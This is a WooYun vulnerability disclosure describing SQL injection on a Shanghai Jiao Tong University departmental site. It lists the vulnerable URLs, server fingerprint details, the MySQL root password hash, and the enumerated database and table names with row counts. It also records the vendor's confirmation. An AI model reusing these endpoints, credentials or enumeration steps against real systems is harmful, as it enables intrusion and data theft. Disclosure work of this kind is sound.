当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-093819

漏洞标题:上海交大某站存在多处SQL注射导致三百多表泄露

相关厂商:sjtu.edu.cn

漏洞作者: Yang

提交时间:2015-01-25 16:05

修复时间:2015-03-11 16:06

公开时间:2015-03-11 16:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-25: 细节已通知厂商并且等待厂商处理中
2015-01-25: 厂商已经确认,细节仅向厂商公开
2015-02-04: 细节向核心白帽子及相关领域专家公开
2015-02-14: 细节向普通白帽子公开
2015-02-24: 细节向实习白帽子公开
2015-03-11: 细节向公众公开

简要描述:

这个应该没重复吧
没重复能上首页么?

详细说明:

漏洞存在于:http://envir.sjtu.edu.cn/
漏洞地址:http://envir.sjtu.edu.cn/TeachandStudy/FosterList.php?num=4&cnum=49&ID=49

1.png


Target: 		http://envir.sjtu.edu.cn/DetailDownLoadInfo.php?num=60&cnum=201&ID=1265
Host IP: 202.120.44.59
Web Server: Microsoft-IIS/7.5
Powered-by: PHP/5.3.10
Powered-by: ASP.NET
DB Server: MySQL >=5
Resp. Time(avg): 221 ms
Current User: root@localhost
DB User & Pass: root:*432ADA312C2AD598576DC0499CCC0BE0FC45FB9B:localhost
Current DB: environmentdb
Sql Version: 5.5.20
Compile OS: Win32
Host Name: Server-SESE
Installation dir: C:/Program Files (x86)/MySQL/MySQL Server 5.5/
System User: root@localhost
Data Bases: information_schema
drupal
empirecms
environmentdb
envphy
mysql
performance_schema
sesesite
tenth
test
yard
yard0
Current User: root@localhost
Current User: root@localhost
Current User: root@localhost


好多好多user 都是有密码的。但是不知道是什么系统的。。

漏洞证明:

我啥都不说

back-end DBMS: MySQL 5.0.11
Database: environmentdb
[22 tables]
+----------------------------------------------+
| admin |
| columntype |
| eadmin |
| ecolumntype |
| eimagelink |
| einfo |
| emenu |
| eotherlink |
| eresume |
| erole |
| eroletomenu |
| eusertorole |
| ewebinfo |
| imagelink |
| info |
| menu |
| otherlink |
| resume |
| role |
| roletomenu |
| usertorole |
| webinfo |
+----------------------------------------------+
Database: empirecms
[171 tables]
+----------------------------------------------+
| phome_ecms_article |
| phome_ecms_article_data_1 |
| phome_ecms_article_doc |
| phome_ecms_article_doc_data |
| phome_ecms_download |
| phome_ecms_download_data_1 |
| phome_ecms_download_doc |
| phome_ecms_download_doc_data |
| phome_ecms_flash |
| phome_ecms_flash_data_1 |
| phome_ecms_flash_doc |
| phome_ecms_flash_doc_data |
| phome_ecms_info |
| phome_ecms_info_data_1 |
| phome_ecms_info_doc |
| phome_ecms_info_doc_data |
| phome_ecms_infoclass_article |
| phome_ecms_infoclass_download |
| phome_ecms_infoclass_flash |
| phome_ecms_infoclass_info |
| phome_ecms_infoclass_movie |
| phome_ecms_infoclass_news |
| phome_ecms_infoclass_photo |
| phome_ecms_infoclass_shop |
| phome_ecms_infotmp_article |
| phome_ecms_infotmp_download |
| phome_ecms_infotmp_flash |
| phome_ecms_infotmp_info |
| phome_ecms_infotmp_movie |
| phome_ecms_infotmp_news |
| phome_ecms_infotmp_photo |
| phome_ecms_infotmp_shop |
| phome_ecms_movie |
| phome_ecms_movie_data_1 |
| phome_ecms_movie_doc |
| phome_ecms_movie_doc_data |
| phome_ecms_news |
| phome_ecms_news_data_1 |
| phome_ecms_news_doc |
| phome_ecms_news_doc_data |
| phome_ecms_photo |
| phome_ecms_photo_data_1 |
| phome_ecms_photo_doc |
| phome_ecms_photo_doc_data |
| phome_ecms_shop |
| phome_ecms_shop_data_1 |
| phome_ecms_shop_doc |
| phome_ecms_shop_doc_data |
| phome_enewsad |
| phome_enewsadclass |
| phome_enewsadminstyle |
| phome_enewsbefrom |
| phome_enewsbq |
| phome_enewsbqclass |
| phome_enewsbqtemp |
| phome_enewsbqtemp_3 |
| phome_enewsbqtemp_4 |
| phome_enewsbqtempclass |
| phome_enewsbuybak |
| phome_enewsbuygroup |
| phome_enewscard |
| phome_enewschecktext |
| phome_enewsclass |
| phome_enewsclassadd |
| phome_enewsclasstemp |
| phome_enewsclasstemp_3 |
| phome_enewsclasstemp_4 |
| phome_enewsclasstempclass |
| phome_enewsdiggips |
| phome_enewsdo |
| phome_enewsdolog |
| phome_enewsdownerror |
| phome_enewsdownrecord |
| phome_enewsdownurlqz |
| phome_enewserrorclass |
| phome_enewsf |
| phome_enewsfava |
| phome_enewsfavaclass |
| phome_enewsfeedback |
| phome_enewsfeedbackclass |
| phome_enewsfeedbackf |
| phome_enewsfile |
| phome_enewsgbook |
| phome_enewsgbookclass |
| phome_enewsgfenip |
| phome_enewsgroup |
| phome_enewshy |
| phome_enewshyclass |
| phome_enewsinfoclass |
| phome_enewsinfotype |
| phome_enewsinfovote |
| phome_enewsjstemp |
| phome_enewsjstemp_3 |
| phome_enewsjstemp_4 |
| phome_enewsjstempclass |
| phome_enewskey |
| phome_enewslink |
| phome_enewslinkclass |
| phome_enewslinktmp |
| phome_enewslisttemp |
| phome_enewslisttemp_3 |
| phome_enewslisttemp_4 |
| phome_enewslisttempclass |
| phome_enewslog |
| phome_enewsloginfail |
| phome_enewsmember |
| phome_enewsmemberadd |
| phome_enewsmemberf |
| phome_enewsmemberfeedback |
| phome_enewsmemberform |
| phome_enewsmembergbook |
| phome_enewsmembergroup |
| phome_enewsmod |
| phome_enewsnewstemp |
| phome_enewsnewstemp_3 |
| phome_enewsnewstemp_4 |
| phome_enewsnewstempclass |
| phome_enewsnotcj |
| phome_enewspage |
| phome_enewspageclass |
| phome_enewspayapi |
| phome_enewspayrecord |
| phome_enewspic |
| phome_enewspicclass |
| phome_enewspl |
| phome_enewspl_data_1 |
| phome_enewsplayer |
| phome_enewsplf |
| phome_enewspltemp |
| phome_enewspltemp_3 |
| phome_enewspltemp_4 |
| phome_enewspostdata |
| phome_enewspublic |
| phome_enewspubtemp |
| phome_enewspubtemp_3 |
| phome_enewspubtemp_4 |
| phome_enewsqf |
| phome_enewsqmsg |
| phome_enewssearch |
| phome_enewssearchall |
| phome_enewssearchall_load |
| phome_enewssearchtemp |
| phome_enewssearchtemp_3 |
| phome_enewssearchtemp_4 |
| phome_enewssearchtempclass |
| phome_enewsshopdd |
| phome_enewsshoppayfs |
| phome_enewsshopps |
| phome_enewsspacestyle |
| phome_enewssql |
| phome_enewstable |
| phome_enewstask |
| phome_enewstempgroup |
| phome_enewstempvar |
| phome_enewstempvar_3 |
| phome_enewstempvar_4 |
| phome_enewstempvarclass |
| phome_enewstogzts |
| phome_enewsuser |
| phome_enewsuserjs |
| phome_enewsuserlist |
| phome_enewsvote |
| phome_enewsvotemod |
| phome_enewsvotetemp |
| phome_enewsvotetemp_3 |
| phome_enewsvotetemp_4 |
| phome_enewswapstyle |
| phome_enewswords |
| phome_enewswriter |
| phome_enewszt |
| phome_enewsztclass |
+----------------------------------------------+
Database: yard
[20 tables]
+----------------------------------------------+
| wp_awsomnews |
| wp_btev_events |
| wp_calendar |
| wp_comments |
| wp_downloads |
| wp_eventscalendar_main |
| wp_links |
| wp_options |
| wp_pollsa |
| wp_pollsip |
| wp_pollsq |
| wp_postmeta |
| wp_posts |
| wp_slim_countries |
| wp_slim_stats |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_terms |
| wp_usermeta |
| wp_users |
+----------------------------------------------+
Database: performance_schema
[17 tables]
+----------------------------------------------+
| cond_instances |
| events_waits_current |
| events_waits_history |
| events_waits_history_long |
| events_waits_summary_by_instance |
| events_waits_summary_by_thread_by_event_name |
| events_waits_summary_global_by_event_name |
| file_instances |
| file_summary_by_event_name |
| file_summary_by_instance |
| mutex_instances |
| performance_timers |
| rwlock_instances |
| setup_consumers |
| setup_instruments |
| setup_timers |
| threads |
+----------------------------------------------+
Database: drupal
[64 tables]
+----------------------------------------------+
| access |
| accesslog |
| aggregator_category |
| aggregator_category_feed |
| aggregator_category_item |
| aggregator_feed |
| aggregator_item |
| authmap |
| blocks |
| book |
| boxes |
| cache |
| comments |
| directory |
| files |
| filter_formats |
| filters |
| flood |
| forum |
| history |
| img_assist_map |
| locales_meta |
| locales_source |
| locales_target |
| menu |
| moderation_filters |
| moderation_roles |
| moderation_votes |
| node |
| node_access |
| node_comment_statistics |
| node_counter |
| nodewords |
| permission |
| poll |
| poll_choices |
| profile_fields |
| profile_values |
| queue |
| role |
| scheduler |
| search_index |
| search_total |
| sequences |
| spam_comments |
| spam_custom |
| spam_nodes |
| spam_statistics |
| spam_tokens |
| system |
| term_data |
| term_hierarchy |
| term_node |
| term_relation |
| term_synonym |
| tinymce_role |
| tinymce_settings |
| url_alias |
| users |
| users_roles |
| variable |
| vocabulary |
| vocabulary_node_types |
| watchdog |
+----------------------------------------------+
Database: envphy
[13 tables]
+----------------------------------------------+
| sjtu_ad |
| sjtu_attachment |
| sjtu_blog |
| sjtu_comment |
| sjtu_link |
| sjtu_navi |
| sjtu_options |
| sjtu_reply |
| sjtu_sort |
| sjtu_tag |
| sjtu_tpl_options_data |
| sjtu_twitter |
| sjtu_user |
+----------------------------------------------+
Database: sesesite
[16 tables]
+----------------------------------------------+
| user |
| accessories |
| counter_area |
| counter_browser |
| counter_daily |
| counter_detail |
| counter_month |
| counter_year |
| emailpage |
| indexvisit |
| news |
| newspic |
| searchkw |
| sesefaculty |
| survey081120 |
| tag |
+----------------------------------------------+
Database: yard0
[32 tables]
+----------------------------------------------+
| owa_click |
| owa_configuration |
| owa_document |
| owa_exit |
| owa_feed_request |
| owa_host |
| owa_impression |
| owa_os |
| owa_referer |
| owa_request |
| owa_session |
| owa_site |
| owa_ua |
| owa_user |
| owa_visitor |
| wp_awsomnews |
| wp_calendar |
| wp_comments |
| wp_downloads |
| wp_eventscalendar_main |
| wp_links |
| wp_options |
| wp_pollsa |
| wp_pollsip |
| wp_pollsq |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_terms |
| wp_usermeta |
| wp_users |
+----------------------------------------------+
Database: mysql
[24 tables]
+----------------------------------------------+
| user |
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| proxies_priv |
| servers |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+----------------------------------------------+
Database: tenth
[36 tables]
+----------------------------------------------+
| jos_banner |
| jos_bannerclient |
| jos_bannertrack |
| jos_categories |
| jos_components |
| jos_contact_details |
| jos_content |
| jos_content_frontpage |
| jos_content_rating |
| jos_core_acl_aro |
| jos_core_acl_aro_groups |
| jos_core_acl_aro_map |
| jos_core_acl_aro_sections |
| jos_core_acl_groups_aro_map |
| jos_core_log_items |
| jos_core_log_searches |
| jos_groups |
| jos_menu |
| jos_menu_types |
| jos_messages |
| jos_messages_cfg |
| jos_migration_backlinks |
| jos_modules |
| jos_modules_menu |
| jos_newsfeeds |
| jos_plugins |
| jos_poll_data |
| jos_poll_date |
| jos_poll_menu |
| jos_polls |
| jos_sections |
| jos_session |
| jos_stats_agents |
| jos_templates_menu |
| jos_users |
| jos_weblinks |
+----------------------------------------------+
Database: information_schema
[37 tables]
+----------------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_RESET |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_TRX |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+----------------------------------------------+
Database: envphy
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| sjtu_options | 61 |
| sjtu_blog | 12 |
| sjtu_navi | 7 |
| sjtu_tag | 6 |
| sjtu_ad | 1 |
| sjtu_link | 1 |
| sjtu_sort | 1 |
| sjtu_twitter | 1 |
| sjtu_user | 1 |
+---------------------------------------+---------+
Database: empirecms
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| phome_enewsf | 105 |
| phome_enewsdolog | 56 |
| phome_enewsbq | 26 |
| phome_enewslink | 14 |
| phome_enewsbqtemp_4 | 12 |
| phome_enewsmemberf | 12 |
| phome_enewsbqtemp | 10 |
| phome_enewsnewstemp_3 | 10 |
| phome_enewsnewstemp_4 | 10 |
| phome_enewsfeedbackf | 9 |
| phome_enewsnewstemp | 9 |
| phome_enewsbqtemp_3 | 8 |
| phome_enewslisttemp | 8 |
| phome_enewslisttemp_3 | 8 |
| phome_enewslisttemp_4 | 8 |
| phome_enewsmod | 8 |
| phome_enewstable | 8 |
| phome_enewsshoppayfs | 6 |
| phome_enewstempvar | 6 |
| phome_enewstempvar_4 | 6 |
| phome_enewsnotcj | 5 |
| phome_enewstempvar_3 | 5 |
| phome_enewsbqclass | 4 |
| phome_enewsmembergroup | 4 |
| phome_enewsplayer | 4 |
| phome_enewsshopps | 4 |
| phome_enewsclasstemp_3 | 3 |
| phome_enewspayapi | 3 |
| phome_enewstempgroup | 3 |
| phome_enewsclasstemp | 2 |
| phome_enewsclasstemp_4 | 2 |
| phome_enewsmemberform | 2 |
| phome_enewsspacestyle | 2 |
| phome_enewsvotetemp | 2 |
| phome_enewsvotetemp_3 | 2 |
| phome_enewsvotetemp_4 | 2 |
| phome_enewswapstyle | 2 |
| phome_enewsadclass | 1 |
| phome_enewsadminstyle | 1 |
| phome_enewsclass | 1 |
| phome_enewsclassadd | 1 |
| phome_enewsdo | 1 |
| phome_enewsfeedbackclass | 1 |
| phome_enewsgbookclass | 1 |
| phome_enewsgroup | 1 |
| phome_enewsjstemp | 1 |
| phome_enewsjstemp_3 | 1 |
| phome_enewsjstemp_4 | 1 |
| phome_enewslog | 1 |
| phome_enewspicclass | 1 |
| phome_enewspltemp | 1 |
| phome_enewspltemp_3 | 1 |
| phome_enewspltemp_4 | 1 |
| phome_enewspublic | 1 |
| phome_enewspubtemp | 1 |
| phome_enewspubtemp_3 | 1 |
| phome_enewssearchtemp | 1 |
| phome_enewsuser | 1 |
+---------------------------------------+---------+
Database: performance_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| setup_consumers | 8 |
| performance_timers | 5 |
| setup_timers | 1 |
+---------------------------------------+---------+
Database: drupal
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| search_index | 91880 |
| spam_comments | 17171 |
| term_node | 15839 |
| node_counter | 8535 |
| node_comment_statistics | 8534 |
| forum | 8523 |
| spam_nodes | 8522 |
| node | 8506 |
| watchdog | 2965 |
| locales_source | 2351 |
| locales_target | 2351 |
| accesslog | 1551 |
| spam_tokens | 624 |
| variable | 129 |
| system | 52 |
| menu | 26 |
| blocks | 19 |
| spam_statistics | 11 |
| files | 7 |
| sequences | 7 |
| term_hierarchy | 7 |
| vocabulary_node_types | 6 |
| filters | 5 |
| users_roles | 4 |
| filter_formats | 3 |
| permission | 3 |
| role | 3 |
| users | 3 |
| locales_meta | 2 |
| tinymce_role | 2 |
| tinymce_settings | 2 |
| vocabulary | 2 |
| node_access | 1 |
| poll | 1 |
+---------------------------------------+---------+
Database: environmentdb
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| info | 1124 |
| columntype | 119 |
| usertorole | 112 |
| einfo | 107 |
| eusertorole | 89 |
| admin | 81 |
| resume | 80 |
| eroletomenu | 74 |
| roletomenu | 74 |
| eresume | 73 |
| eadmin | 72 |
| ecolumntype | 72 |
| emenu | 14 |
| menu | 14 |
| erole | 8 |
| role | 8 |
| eimagelink | 5 |
| imagelink | 5 |
| ewebinfo | 1 |
| webinfo | 1 |
+---------------------------------------+---------+
Database: sesesite
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| counter_daily | 33096 |
| counter_detail | 29151 |
| counter_month | 1632 |
| indexvisit | 1620 |
| searchkw | 1192 |
| counter_area | 150 |
| counter_browser | 93 |
| counter_year | 72 |
| survey081120 | 51 |
| `user` | 1 |
| accessories | 1 |
+---------------------------------------+---------+
Database: mysql
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| help_relation | 1028 |
| help_topic | 508 |
| help_keyword | 465 |
| help_category | 38 |
| `user` | 1 |
| proxies_priv | 1 |
+---------------------------------------+---------+
Database: tenth
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| jos_content | 53 |
| jos_modules | 39 |
| jos_components | 32 |
| jos_modules_menu | 32 |
| jos_plugins | 32 |
| jos_menu | 23 |
| jos_categories | 22 |
| jos_session | 15 |
| jos_newsfeeds | 14 |
| jos_poll_data | 12 |
| jos_poll_date | 12 |
| jos_core_acl_aro_groups | 11 |
| jos_content_frontpage | 8 |
| jos_menu_types | 4 |
| jos_sections | 4 |
| jos_groups | 3 |
| jos_core_acl_aro | 2 |
| jos_core_acl_groups_aro_map | 2 |
| jos_templates_menu | 2 |
| jos_users | 2 |
| jos_bannerclient | 1 |
| jos_contact_details | 1 |
| jos_content_rating | 1 |
| jos_core_acl_aro_sections | 1 |
| jos_polls | 1 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 5155 |
| STATISTICS | 823 |
| TABLES | 452 |
| PARTITIONS | 396 |
| KEY_COLUMN_USAGE | 385 |
| TABLE_CONSTRAINTS | 332 |
| SESSION_VARIABLES | 327 |
| GLOBAL_VARIABLES | 316 |
| GLOBAL_STATUS | 310 |
| SESSION_STATUS | 310 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 195 |
| COLLATIONS | 195 |
| CHARACTER_SETS | 39 |
| USER_PRIVILEGES | 28 |
| PLUGINS | 20 |
| SCHEMATA | 12 |
| ENGINES | 9 |
| INNODB_CMP | 5 |
| INNODB_CMP_RESET | 5 |
| INNODB_CMPMEM | 5 |
| INNODB_CMPMEM_RESET | 5 |
| PROCESSLIST | 1 |
+---------------------------------------+---------+


修复方案:

过滤

版权声明:转载请注明来源 Yang@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-01-25 20:12

厂商回复:

谢谢,我们立即处理!

最新状态:

暂无


漏洞评价:

评论

  1. 2015-02-02 14:54 | 计算姬 ( 普通白帽子 | Rank:398 漏洞数:90 | 看我看我看我啊)

    问下洞主,这个是大厂商么

  2. 2015-02-02 15:55 | Yang ( 普通白帽子 | Rank:247 漏洞数:86 | 作为菜鸟,大米手机摔破了怎么办?)

    @计算姬走的小厂商